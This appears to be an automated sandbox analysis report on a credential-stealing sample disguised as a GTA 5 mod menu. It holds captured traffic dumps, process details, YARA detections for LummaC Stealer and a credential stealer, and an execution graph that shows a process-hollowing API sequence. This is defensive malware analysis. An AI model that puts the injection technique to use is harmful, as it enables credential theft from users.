                                                                  2024-12-30 19:41:11 UTC1369INData Raw: 6d 63 63 6c 63 47 4c 31 5a 75 31 70 69 4d 4d 54 79 6e 6e 69 4a 4b 48 30 4b 43 6e 70 6a 58 39 56 55 72 45 75 54 34 70 65 7a 42 43 4c 36 6a 78 4a 46 4d 59 48 34 47 75 56 7a 7a 7a 6a 58 72 4d 55 72 76 34 4c 46 49 6d 6c 66 46 74 42 6f 77 42 55 76 79 50 4d 47 49 7a 59 57 30 6c 76 39 6d 44 45 63 62 66 4f 41 4d 78 51 6e 42 6a 5a 6a 7a 49 55 33 70 59 42 49 46 47 64 52 32 2b 4a 57 6f 6b 61 6c 4f 4a 6c 64 48 44 6d 42 62 67 76 73 59 63 36 35 31 71 33 52 6f 79 4b 44 77 50 70 71 31 45 4f 64 4b 30 64 59 6f 5a 65 31 42 69 62 7a 31 35 70 5a 5a 49 50 35 55 69 76 34 47 76 39 55 75 67 41 72 4b 34 31 43 6f 32 77 65 46 42 75 75 53 73 59 73 69 43 53 49 4a 44 59 4a 56 4e 79 38 43 66 6c 54 36 54 56 50 2f 30 79 6f 53 69 50 2b 67 49 47 69 36 64 52 57 6b 4f 4d 45 57 66 44 52 4e 70
                                                                  Data Ascii: mcclcGL1Zu1piMMTynniJKH0KCnpjX9VUrEuT4pezBCL6jxJFMYH4GuVzzzjXrMUrv4LFImlfFtBowBUvyPMGIzYW0lv9mDEcbfOAMxQnBjZjzIU3pYBIFGdR2+JWokalOJldHDmBbgvsYc651q3RoyKDwPpq1EOdK0dYoZe1Bibz15pZZIP5Uiv4Gv9UugArK41Co2weFBuuSsYsiCSIJDYJVNy8CflT6TVP/0yoSiP+gIGi6dRWkOMEWfDRNp
                                                                  2024-12-30 19:41:11 UTC1369INData Raw: 6c 45 56 6b 67 44 46 56 4e 66 78 4b 62 52 50 6d 45 43 79 6d 53 49 57 69 5a 39 76 49 31 71 74 54 32 4f 64 59 65 77 49 2b 38 45 39 66 55 72 4c 41 4d 42 6f 72 4d 59 78 35 6a 4b 69 48 5a 43 69 4d 6d 76 65 6f 6e 4d 56 52 35 4d 6c 57 37 6c 65 34 51 69 4a 79 30 46 5a 63 38 63 41 79 45 6d 6b 33 54 4c 67 52 4c 6b 31 6f 36 70 58 46 75 4f 6e 52 79 74 54 6d 54 46 46 6a 6b 50 4e 4f 34 65 66 58 55 35 57 6d 69 61 79 57 63 58 69 43 37 46 43 71 6a 75 66 76 77 38 4a 6a 59 56 36 4a 32 57 67 48 77 2b 77 51 63 45 73 73 39 74 70 53 55 2f 6b 66 63 38 73 6d 4f 51 4d 76 45 2b 59 51 4c 4b 5a 49 68 61 4a 6e 32 38 6d 59 37 78 47 63 4a 68 73 7a 56 4c 7a 78 7a 39 5a 53 5a 73 50 76 48 69 52 32 43 72 48 53 4a 74 42 6a 71 45 51 4c 59 6e 65 41 54 70 78 6e 43 31 48 6a 6c 76 54 4a 6f 6e 4c
                                                                  Data Ascii: lEVkgDFVNfxKbRPmECymSIWiZ9vI1qtT2OdYewI+8E9fUrLAMBorMYx5jKiHZCiMmveonMVR5MlW7le4QiJy0FZc8cAyEmk3TLgRLk1o6pXFuOnRytTmTFFjkPNO4efXU5WmiayWcXiC7FCqjufvw8JjYV6J2WgHw+wQcEss9tpSU/kfc8smOQMvE+YQLKZIhaJn28mY7xGcJhszVLzxz9ZSZsPvHiR2CrHSJtBjqEQLYneATpxnC1HjlvTJonL
                                                                  2024-12-30 19:41:11 UTC1369INData Raw: 30 4d 2b 6c 75 6c 33 51 6a 72 59 49 4a 45 33 5a 6b 55 4c 74 53 4c 59 79 64 5a 72 43 52 69 75 30 4b 4c 4f 49 58 51 5a 48 46 43 77 77 79 39 53 4c 36 64 47 4d 41 2f 70 52 6d 2f 2f 67 34 57 6a 74 38 4f 43 69 65 52 4c 6b 47 6e 63 39 31 53 71 4d 64 66 4c 6d 6a 4f 42 38 46 46 6e 6f 49 6f 72 7a 36 38 50 49 6d 51 54 6a 6d 4b 73 6c 70 54 53 74 6f 57 65 35 68 4f 2b 6a 32 43 6e 6d 56 72 45 73 77 38 76 47 65 76 35 6a 48 31 62 70 49 79 30 59 73 33 41 64 65 43 52 41 35 68 72 41 52 50 33 53 54 39 45 70 65 63 59 48 30 56 6b 68 2f 6e 53 36 54 78 45 64 49 2f 34 68 69 64 70 56 51 78 79 70 64 51 55 33 65 39 58 45 4f 6c 5a 4d 77 34 39 64 42 34 54 68 61 52 45 72 68 35 72 76 77 54 38 7a 69 6a 41 59 66 6e 44 41 36 4c 31 6c 45 78 49 5a 45 44 41 59 46 63 2b 78 76 31 34 6d 39 7a 64
                                                                  Data Ascii: 0M+lul3QjrYIJE3ZkULtSLYydZrCRiu0KLOIXQZHFCwwy9SL6dGMA/pRm//g4Wjt8OCieRLkGnc91SqMdfLmjOB8FFnoIorz68PImQTjmKslpTStoWe5hO+j2CnmVrEsw8vGev5jH1bpIy0Ys3AdeCRA5hrARP3ST9EpecYH0Vkh/nS6TxEdI/4hidpVQxypdQU3e9XEOlZMw49dB4ThaRErh5rvwT8zijAYfnDA6L1lExIZEDAYFc+xv14m9zd
                                                                  2024-12-30 19:41:11 UTC1369INData Raw: 35 68 50 78 71 35 54 2b 7a 42 34 4b 30 4b 51 6e 6a 6b 32 49 62 55 4a 30 62 58 4a 70 47 34 51 69 5a 2f 56 52 30 54 63 59 33 78 31 71 77 32 67 7a 42 59 75 49 73 78 35 51 6a 49 59 69 6a 58 51 5a 6b 6d 51 35 77 75 46 4c 61 41 6f 7a 59 57 6c 46 33 35 54 76 59 51 64 4f 48 4f 75 4e 6d 68 68 6d 4e 6e 46 41 77 79 72 39 47 56 30 65 68 4c 31 61 5a 64 2f 67 4d 6f 50 39 36 4b 42 6a 36 47 2f 67 6c 71 4e 38 66 73 47 61 61 49 72 47 76 4b 77 7a 6e 79 57 45 59 52 61 4d 76 62 64 78 5a 2f 43 2b 54 78 6a 6f 75 56 63 55 46 7a 6b 6d 30 77 57 33 4f 56 76 38 67 6a 71 51 4d 41 59 2b 65 52 69 51 6a 6e 6b 4e 32 6d 45 7a 74 58 35 44 50 57 33 68 51 35 32 48 62 53 4a 65 4f 45 73 70 46 73 68 61 71 67 77 30 69 2b 49 64 34 53 58 33 48 47 46 75 65 50 2b 77 35 71 66 39 47 54 6b 61 55 59 4f
                                                                  Data Ascii: 5hPxq5T+zB4K0KQnjk2IbUJ0bXJpG4QiZ/VR0TcY3x1qw2gzBYuIsx5QjIYijXQZkmQ5wuFLaAozYWlF35TvYQdOHOuNmhhmNnFAwyr9GV0ehL1aZd/gMoP96KBj6G/glqN8fsGaaIrGvKwznyWEYRaMvbdxZ/C+TxjouVcUFzkm0wW3OVv8gjqQMAY+eRiQjnkN2mEztX5DPW3hQ52HbSJeOEspFshaqgw0i+Id4SX3HGFueP+w5qf9GTkaUYO


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:14:40:56
                                                                  Start date:30/12/2024
                                                                  Path:C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"
                                                                  Imagebase:0xf80000
                                                                  File size:820'736 bytes
                                                                  MD5 hash:97098E0B103ACDF642B87D2B96155992
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:14:40:56
                                                                  Start date:30/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:14:40:57
                                                                  Start date:30/12/2024
                                                                  Path:C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"
                                                                  Imagebase:0xf80000
                                                                  File size:820'736 bytes
                                                                  MD5 hash:97098E0B103ACDF642B87D2B96155992
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:14:40:57
                                                                  Start date:30/12/2024
                                                                  Path:C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe"
                                                                  Imagebase:0xf80000
                                                                  File size:820'736 bytes
                                                                  MD5 hash:97098E0B103ACDF642B87D2B96155992
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:8.1%
                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                    Signature Coverage:1.1%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:26
                                                                    execution_graph 18437 f870e0 18442 f874f4 18437->18442 18443 f870ea 18442->18443 18444 f87504 18442->18444 18446 f87254 18443->18446 18444->18443 18449 f89bf5 InitializeCriticalSectionEx 18444->18449 18450 f87269 18446->18450 18449->18444 18451 f87278 18450->18451 18452 f8727f 18450->18452 18456 f9102c 18451->18456 18459 f90fbb 18452->18459 18455 f870f4 18457 f90fbb std::ios_base::_Init 32 API calls 18456->18457 18458 f9103e 18457->18458 18458->18455 18462 f9121e 18459->18462 18463 f9122a ___scrt_is_nonwritable_in_current_image 18462->18463 18470 f91cd1 EnterCriticalSection 18463->18470 18465 f91238 18471 f91042 18465->18471 18467 f91245 18481 f9126d 18467->18481 18470->18465 18472 f910d0 std::_Locinfo::_Locinfo_dtor 18471->18472 18473 f9105d 18471->18473 18472->18467 18473->18472 18474 f9c025 std::ios_base::_Init 32 API calls 18473->18474 18480 f910b0 18473->18480 18476 f910a6 18474->18476 18475 f9c025 std::ios_base::_Init 32 API calls 18477 f910c6 18475->18477 18478 f95677 ___free_lconv_mon 14 API calls 18476->18478 18479 f95677 ___free_lconv_mon 14 API calls 18477->18479 18478->18480 18479->18472 18480->18472 18480->18475 18484 f91ce8 LeaveCriticalSection 18481->18484 18483 f90fec 18483->18455 18484->18483 20244 f975c0 20247 f91ce8 LeaveCriticalSection 20244->20247 20246 f975c7 20247->20246 18911 f88ab0 18912 f88abf 18911->18912 18914 f88ae3 18912->18914 18915 f9300b 18912->18915 18916 f9301e _Fputc 18915->18916 18919 f93078 18916->18919 18918 f93033 _Fputc 18918->18914 18920 f9308a 18919->18920 18923 f930ad 18919->18923 18921 f91b68 __strnicoll 29 API calls 18920->18921 18922 f930a5 18921->18922 18922->18918 18923->18920 18924 f930d4 18923->18924 18927 f931ae 18924->18927 18928 f931ba ___scrt_is_nonwritable_in_current_image 18927->18928 18935 f8d0ff EnterCriticalSection 18928->18935 18930 f931c8 18936 f9310e 18930->18936 18932 f931d5 18945 f931fd 18932->18945 18935->18930 18937 f921a8 ___scrt_uninitialize_crt 64 API calls 18936->18937 18938 f93129 18937->18938 18948 f97f5d 18938->18948 18941 f969b4 __strnicoll 14 API calls 18942 f93172 18941->18942 18944 f95677 ___free_lconv_mon 14 API calls 18942->18944 18943 f9314e 18943->18932 18944->18943 18952 f8d113 LeaveCriticalSection 18945->18952 18947 f9310c 18947->18918 18949 f93133 18948->18949 18950 f97f74 18948->18950 18949->18941 18949->18943 18950->18949 18951 f95677 ___free_lconv_mon 14 API calls 18950->18951 18951->18949 18952->18947 20260 f851b0 20261 f851cf 20260->20261 20262 f851f7 20260->20262 20266 f85350 20261->20266 20270 f85400 20262->20270 20264 f851ef 20267 f8539a std::ios_base::_Init 20266->20267 20274 f854f0 20267->20274 20271 f85447 std::ios_base::_Init 20270->20271 20272 f854f0 std::ios_base::_Init 30 API calls 20271->20272 20273 f8547c 20272->20273 20273->20264 20287 f856f0 20274->20287 20278 f8552f std::ios_base::_Init 20279 f856f0 std::ios_base::_Init 5 API calls 20278->20279 20284 f85568 std::ios_base::_Init 20278->20284 20280 f855c2 20279->20280 20294 f85810 20280->20294 20285 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20284->20285 20286 f853b9 20285->20286 20286->20264 20288 f8570b std::ios_base::_Init 20287->20288 20289 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20288->20289 20290 f8551d 20289->20290 20290->20278 20291 f85770 20290->20291 20301 f87934 20291->20301 20296 f8583e std::ios_base::_Init 20294->20296 20295 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20297 f855d9 20295->20297 20296->20295 20298 f858b0 20297->20298 20315 f85950 20298->20315 20306 f879cd 20301->20306 20304 f8a41c CallUnexpected RaiseException 20305 f87953 20304->20305 20309 f86780 20306->20309 20310 f867c1 std::invalid_argument::invalid_argument 20309->20310 20311 f8aa1d ___std_exception_copy 29 API calls 20310->20311 20312 f867e0 20311->20312 20313 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20312->20313 20314 f867ea 20313->20314 20314->20304 20318 f85970 20315->20318 20319 f85987 std::ios_base::_Init 20318->20319 20322 f82ae0 20319->20322 20323 f82aff 20322->20323 20328 f82af3 20322->20328 20324 f82b0c 20323->20324 20325 f82b1f 20323->20325 20329 f82b80 20324->20329 20337 f82bf0 20325->20337 20328->20284 20330 f82b9e 20329->20330 20331 f82ba3 20329->20331 20340 f82c10 20330->20340 20333 f82bf0 std::ios_base::_Init 3 API calls 20331->20333 20334 f82bae 20333->20334 20335 f82bbb 20334->20335 20344 f919cf 20334->20344 20335->20328 20338 f87113 std::ios_base::_Init 3 API calls 20337->20338 20339 f82c02 20338->20339 20339->20328 20341 f82c28 std::ios_base::_Init 20340->20341 20342 f8a41c CallUnexpected RaiseException 20341->20342 20343 f82c3d 20342->20343 20345 f91c0e __strnicoll 29 API calls 20344->20345 20346 f919de 20345->20346 20347 f919ec __Getctype 11 API calls 20346->20347 20348 f919eb 20347->20348 20359 f95bb0 20360 f95bbb 20359->20360 20364 f95bcb 20359->20364 20365 f95cb5 20360->20365 20363 f95677 ___free_lconv_mon 14 API calls 20363->20364 20366 f95cca 20365->20366 20367 f95cd0 20365->20367 20368 f95677 ___free_lconv_mon 14 API calls 20366->20368 20369 f95677 ___free_lconv_mon 14 API calls 20367->20369 20368->20367 20370 f95cdc 20369->20370 20371 f95677 ___free_lconv_mon 14 API calls 20370->20371 20372 f95ce7 20371->20372 20373 f95677 ___free_lconv_mon 14 API calls 20372->20373 20374 f95cf2 20373->20374 20375 f95677 ___free_lconv_mon 14 API calls 20374->20375 20376 f95cfd 20375->20376 20377 f95677 ___free_lconv_mon 14 API calls 20376->20377 20378 f95d08 20377->20378 20379 f95677 ___free_lconv_mon 14 API calls 20378->20379 20380 f95d13 20379->20380 20381 f95677 ___free_lconv_mon 14 API calls 20380->20381 20382 f95d1e 20381->20382 20383 f95677 ___free_lconv_mon 14 API calls 20382->20383 20384 f95d29 20383->20384 20385 f95677 ___free_lconv_mon 14 API calls 20384->20385 20386 f95d37 20385->20386 20391 f95e2e 20386->20391 20392 f95e3a ___scrt_is_nonwritable_in_current_image 20391->20392 20407 f91cd1 EnterCriticalSection 20392->20407 20394 f95e6e 20408 f95e8d 20394->20408 20396 f95e44 20396->20394 20398 f95677 ___free_lconv_mon 14 API calls 20396->20398 20398->20394 20399 f95e99 20400 f95ea5 ___scrt_is_nonwritable_in_current_image 20399->20400 20412 f91cd1 EnterCriticalSection 20400->20412 20402 f95eaf 20403 f95bd1 __strnicoll 14 API calls 20402->20403 20404 f95ec2 20403->20404 20413 f95ee2 20404->20413 20407->20396 20411 f91ce8 LeaveCriticalSection 20408->20411 20410 f95d5d 20410->20399 20411->20410 20412->20402 20416 f91ce8 LeaveCriticalSection 20413->20416 20415 f95bc3 20415->20363 20416->20415 16755 fb019e 16756 fb01d4 16755->16756 16757 fb0321 GetPEB 16756->16757 16758 fb0333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 16756->16758 16761 fb03ca TerminateProcess 16756->16761 16757->16758 16758->16756 16759 fb03da WriteProcessMemory 16758->16759 16760 fb041f 16759->16760 16762 fb0461 WriteProcessMemory Wow64SetThreadContext ResumeThread 16760->16762 16763 fb0424 WriteProcessMemory 16760->16763 16761->16756 16763->16760 19209 f88660 19210 f8867b 19209->19210 19212 f8868d 19210->19212 19213 f88051 19210->19213 19216 f93a4e 19213->19216 19217 f93a5a ___scrt_is_nonwritable_in_current_image 19216->19217 19218 f93a78 19217->19218 19219 f93a61 19217->19219 19229 f8d0ff EnterCriticalSection 19218->19229 19220 f912d4 __strnicoll 14 API calls 19219->19220 19222 f93a66 19220->19222 19224 f919bf __strnicoll 29 API calls 19222->19224 19223 f93a87 19230 f93acc 19223->19230 19226 f88063 19224->19226 19226->19212 19227 f93a95 19244 f93ac4 19227->19244 19229->19223 19231 f93ae2 19230->19231 19234 f93b6c _Ungetc 19230->19234 19232 f93b10 19231->19232 19231->19234 19247 f9f3cf 19231->19247 19232->19234 19235 f98e04 _Ungetc 29 API calls 19232->19235 19234->19227 19236 f93b22 19235->19236 19237 f98e04 _Ungetc 29 API calls 19236->19237 19243 f93b45 19236->19243 19238 f93b2e 19237->19238 19240 f98e04 _Ungetc 29 API calls 19238->19240 19238->19243 19241 f93b3a 19240->19241 19242 f98e04 _Ungetc 29 API calls 19241->19242 19242->19243 19243->19234 19252 f93b82 19243->19252 19279 f8d113 LeaveCriticalSection 19244->19279 19246 f93aca 19246->19226 19248 f969b4 __strnicoll 14 API calls 19247->19248 19249 f9f3ec 19248->19249 19250 f95677 ___free_lconv_mon 14 API calls 19249->19250 19251 f9f3f6 19250->19251 19251->19232 19253 f98e04 _Ungetc 29 API calls 19252->19253 19254 f93ba5 19253->19254 19255 f98e04 _Ungetc 29 API calls 19254->19255 19262 f93bce 19254->19262 19256 f93bb3 19255->19256 19258 f98e04 _Ungetc 29 API calls 19256->19258 19256->19262 19260 f93bc1 19258->19260 19259 f93c08 19263 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19259->19263 19261 f98e04 _Ungetc 29 API calls 19260->19261 19261->19262 19262->19259 19265 f98af6 19262->19265 19264 f93c86 19263->19264 19264->19234 19266 f98b09 _Fputc 19265->19266 19269 f98b30 19266->19269 19268 f98b1e _Fputc 19268->19259 19271 f98b45 19269->19271 19270 f98b86 19274 f98b72 std::invalid_argument::invalid_argument 19270->19274 19275 f98b49 std::invalid_argument::invalid_argument _Fputc 19270->19275 19276 f957c1 _Fputc WideCharToMultiByte 19270->19276 19271->19270 19272 f8d580 _Fputc 39 API calls 19271->19272 19271->19274 19271->19275 19272->19270 19273 f91b68 __strnicoll 29 API calls 19273->19275 19274->19273 19274->19275 19275->19268 19277 f98c41 19276->19277 19277->19275 19278 f98c57 GetLastError 19277->19278 19278->19274 19278->19275 19279->19246 20711 f88760 20712 f8876c __EH_prolog3_GS 20711->20712 20714 f887d8 20712->20714 20715 f887be 20712->20715 20720 f88786 20712->20720 20730 f9244a 20714->20730 20727 f8800d 20715->20727 20719 f887f7 20723 f88894 20719->20723 20725 f9244a 45 API calls 20719->20725 20726 f888ce 20719->20726 20750 f87b4b 20719->20750 20754 f89d7e 20720->20754 20722 f86800 std::ios_base::_Init 29 API calls 20722->20720 20723->20722 20725->20719 20726->20723 20757 f938e7 20726->20757 20770 f92605 20727->20770 20731 f92456 ___scrt_is_nonwritable_in_current_image 20730->20731 20732 f92478 20731->20732 20733 f92460 20731->20733 21033 f8d0ff EnterCriticalSection 20732->21033 20734 f912d4 __strnicoll 14 API calls 20733->20734 20736 f92465 20734->20736 20738 f919bf __strnicoll 29 API calls 20736->20738 20737 f92483 20739 f98e04 _Ungetc 29 API calls 20737->20739 20747 f9249b 20737->20747 20749 f92470 20738->20749 20739->20747 20740 f9252b 21034 f92563 20740->21034 20741 f92503 20743 f912d4 __strnicoll 14 API calls 20741->20743 20745 f92508 20743->20745 20744 f92531 21044 f9255b 20744->21044 20748 f919bf __strnicoll 29 API calls 20745->20748 20747->20740 20747->20741 20748->20749 20749->20719 20751 f87b7f 20750->20751 20753 f87b5b 20750->20753 21048 f88fef 20751->21048 20753->20719 20755 f87191 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 20754->20755 20756 f89d88 20755->20756 20756->20756 20758 f938f3 ___scrt_is_nonwritable_in_current_image 20757->20758 20759 f938fa 20758->20759 20760 f9390f 20758->20760 20762 f912d4 __strnicoll 14 API calls 20759->20762 21059 f8d0ff EnterCriticalSection 20760->21059 20764 f938ff 20762->20764 20763 f93919 21060 f9395a 20763->21060 20766 f919bf __strnicoll 29 API calls 20764->20766 20768 f9390a 20766->20768 20768->20726 20771 f92611 ___scrt_is_nonwritable_in_current_image 20770->20771 20772 f92618 20771->20772 20773 f9262f 20771->20773 20774 f912d4 __strnicoll 14 API calls 20772->20774 20783 f8d0ff EnterCriticalSection 20773->20783 20776 f9261d 20774->20776 20778 f919bf __strnicoll 29 API calls 20776->20778 20777 f9263b 20784 f9267c 20777->20784 20780 f88018 20778->20780 20780->20720 20783->20777 20785 f92699 20784->20785 20786 f926ff 20784->20786 20788 f98e04 _Ungetc 29 API calls 20785->20788 20787 f927c6 20786->20787 20789 f98e04 _Ungetc 29 API calls 20786->20789 20820 f92646 20787->20820 20839 f9de3e 20787->20839 20790 f9269f 20788->20790 20791 f92714 20789->20791 20793 f98e04 _Ungetc 29 API calls 20790->20793 20809 f926c2 20790->20809 20795 f98e04 _Ungetc 29 API calls 20791->20795 20812 f92737 20791->20812 20794 f926ab 20793->20794 20799 f98e04 _Ungetc 29 API calls 20794->20799 20794->20809 20800 f92720 20795->20800 20796 f926dd 20796->20820 20824 f9259f 20796->20824 20797 f9274e 20798 f9259f 43 API calls 20797->20798 20802 f92757 20798->20802 20803 f926b7 20799->20803 20804 f98e04 _Ungetc 29 API calls 20800->20804 20800->20812 20805 f8d27f __Getctype 39 API calls 20802->20805 20802->20820 20806 f98e04 _Ungetc 29 API calls 20803->20806 20807 f9272c 20804->20807 20808 f9276f 20805->20808 20806->20809 20810 f98e04 _Ungetc 29 API calls 20807->20810 20811 f92799 20808->20811 20813 f9259f 43 API calls 20808->20813 20809->20786 20809->20796 20810->20812 20835 f98c9a 20811->20835 20812->20787 20812->20797 20815 f92780 20813->20815 20815->20811 20817 f92786 20815->20817 20816 f927ad 20819 f912d4 __strnicoll 14 API calls 20816->20819 20816->20820 20818 f938e7 31 API calls 20817->20818 20818->20820 20819->20820 20821 f92674 20820->20821 21032 f8d113 LeaveCriticalSection 20821->21032 20823 f9267a 20823->20780 20825 f92563 20824->20825 20826 f9256f 20825->20826 20827 f92584 20825->20827 20828 f912d4 __strnicoll 14 API calls 20826->20828 20829 f92593 20827->20829 20860 f9de33 20827->20860 20830 f92574 20828->20830 20829->20796 20832 f919bf __strnicoll 29 API calls 20830->20832 20834 f9257f 20832->20834 20834->20796 20836 f98cad _Fputc 20835->20836 21013 f98cd1 20836->21013 20838 f98cbf _Fputc 20838->20816 20840 f9dfd8 20839->20840 20841 f9dfe7 20840->20841 20844 f9dffc 20840->20844 20842 f912d4 __strnicoll 14 API calls 20841->20842 20843 f9dfec 20842->20843 20845 f919bf __strnicoll 29 API calls 20843->20845 20846 f9e05a 20844->20846 20847 f9f3cf _Ungetc 14 API calls 20844->20847 20854 f9dff7 20844->20854 20845->20854 20848 f98e04 _Ungetc 29 API calls 20846->20848 20847->20846 20849 f9e08a 20848->20849 20850 fa2d43 43 API calls 20849->20850 20851 f9e092 20850->20851 20852 f98e04 _Ungetc 29 API calls 20851->20852 20851->20854 20853 f9e0cc 20852->20853 20853->20854 20855 f98e04 _Ungetc 29 API calls 20853->20855 20854->20820 20856 f9e0da 20855->20856 20856->20854 20857 f98e04 _Ungetc 29 API calls 20856->20857 20858 f9e0e8 20857->20858 20859 f98e04 _Ungetc 29 API calls 20858->20859 20859->20854 20861 f9de49 20860->20861 20862 f9de6e 20861->20862 20863 f9de56 20861->20863 20867 f9decd 20862->20867 20869 f9f3cf _Ungetc 14 API calls 20862->20869 20875 f92590 20862->20875 20864 f912d4 __strnicoll 14 API calls 20863->20864 20865 f9de5b 20864->20865 20866 f919bf __strnicoll 29 API calls 20865->20866 20866->20875 20868 f98e04 _Ungetc 29 API calls 20867->20868 20870 f9dee6 20868->20870 20869->20867 20881 fa2d43 20870->20881 20873 f98e04 _Ungetc 29 API calls 20874 f9df1f 20873->20874 20874->20875 20876 f98e04 _Ungetc 29 API calls 20874->20876 20875->20796 20877 f9df2d 20876->20877 20877->20875 20878 f98e04 _Ungetc 29 API calls 20877->20878 20879 f9df3b 20878->20879 20880 f98e04 _Ungetc 29 API calls 20879->20880 20880->20875 20882 fa2d4f ___scrt_is_nonwritable_in_current_image 20881->20882 20883 fa2d57 20882->20883 20888 fa2d72 20882->20888 20884 f912e7 __dosmaperr 14 API calls 20883->20884 20885 fa2d5c 20884->20885 20886 f912d4 __strnicoll 14 API calls 20885->20886 20910 f9deee 20886->20910 20887 fa2d89 20890 f912e7 __dosmaperr 14 API calls 20887->20890 20888->20887 20889 fa2dc4 20888->20889 20891 fa2dcd 20889->20891 20892 fa2de2 20889->20892 20893 fa2d8e 20890->20893 20894 f912e7 __dosmaperr 14 API calls 20891->20894 20911 f9cfd8 EnterCriticalSection 20892->20911 20896 f912d4 __strnicoll 14 API calls 20893->20896 20898 fa2dd2 20894->20898 20897 fa2d96 20896->20897 20903 f919bf __strnicoll 29 API calls 20897->20903 20900 f912d4 __strnicoll 14 API calls 20898->20900 20899 fa2de8 20901 fa2e1c 20899->20901 20902 fa2e07 20899->20902 20900->20897 20912 fa2e5c 20901->20912 20905 f912d4 __strnicoll 14 API calls 20902->20905 20903->20910 20906 fa2e0c 20905->20906 20908 f912e7 __dosmaperr 14 API calls 20906->20908 20907 fa2e17 20975 fa2e54 20907->20975 20908->20907 20910->20873 20910->20875 20911->20899 20913 fa2e6e 20912->20913 20914 fa2e86 20912->20914 20915 f912e7 __dosmaperr 14 API calls 20913->20915 20916 fa31c8 20914->20916 20921 fa2ec9 20914->20921 20917 fa2e73 20915->20917 20918 f912e7 __dosmaperr 14 API calls 20916->20918 20919 f912d4 __strnicoll 14 API calls 20917->20919 20920 fa31cd 20918->20920 20922 fa2e7b 20919->20922 20923 f912d4 __strnicoll 14 API calls 20920->20923 20921->20922 20924 fa2ed4 20921->20924 20928 fa2f04 20921->20928 20922->20907 20925 fa2ee1 20923->20925 20926 f912e7 __dosmaperr 14 API calls 20924->20926 20929 f919bf __strnicoll 29 API calls 20925->20929 20927 fa2ed9 20926->20927 20930 f912d4 __strnicoll 14 API calls 20927->20930 20931 fa2f1d 20928->20931 20932 fa2f2a 20928->20932 20933 fa2f58 20928->20933 20929->20922 20930->20925 20931->20932 20966 fa2f46 20931->20966 20934 f912e7 __dosmaperr 14 API calls 20932->20934 20935 f956b1 __strnicoll 15 API calls 20933->20935 20936 fa2f2f 20934->20936 20937 fa2f69 20935->20937 20938 f912d4 __strnicoll 14 API calls 20936->20938 20940 f95677 ___free_lconv_mon 14 API calls 20937->20940 20941 fa2f36 20938->20941 20943 fa2f72 20940->20943 20944 f919bf __strnicoll 29 API calls 20941->20944 20942 fa30a4 20945 fa3118 20942->20945 20948 fa30bd GetConsoleMode 20942->20948 20946 f95677 ___free_lconv_mon 14 API calls 20943->20946 20974 fa2f41 20944->20974 20947 fa311c ReadFile 20945->20947 20949 fa2f79 20946->20949 20950 fa3190 GetLastError 20947->20950 20951 fa3134 20947->20951 20948->20945 20952 fa30ce 20948->20952 20954 fa2f9e 20949->20954 20955 fa2f83 20949->20955 20956 fa319d 20950->20956 20957 fa30f4 20950->20957 20951->20950 20967 fa310d 20951->20967 20952->20947 20953 fa30d4 ReadConsoleW 20952->20953 20958 fa30ee GetLastError 20953->20958 20953->20967 20962 f9c0d2 31 API calls 20954->20962 20960 f912d4 __strnicoll 14 API calls 20955->20960 20961 f912d4 __strnicoll 14 API calls 20956->20961 20963 f912fa __dosmaperr 14 API calls 20957->20963 20957->20974 20958->20957 20959 f95677 ___free_lconv_mon 14 API calls 20959->20922 20964 fa2f88 20960->20964 20965 fa31a2 20961->20965 20962->20966 20963->20974 20970 f912e7 __dosmaperr 14 API calls 20964->20970 20971 f912e7 __dosmaperr 14 API calls 20965->20971 20978 fa017f 20966->20978 20968 fa3159 20967->20968 20969 fa3170 20967->20969 20967->20974 20987 fa3265 20968->20987 20969->20974 21000 fa3509 20969->21000 20970->20974 20971->20974 20974->20959 21012 f9cffb LeaveCriticalSection 20975->21012 20977 fa2e5a 20977->20910 20979 fa018c 20978->20979 20981 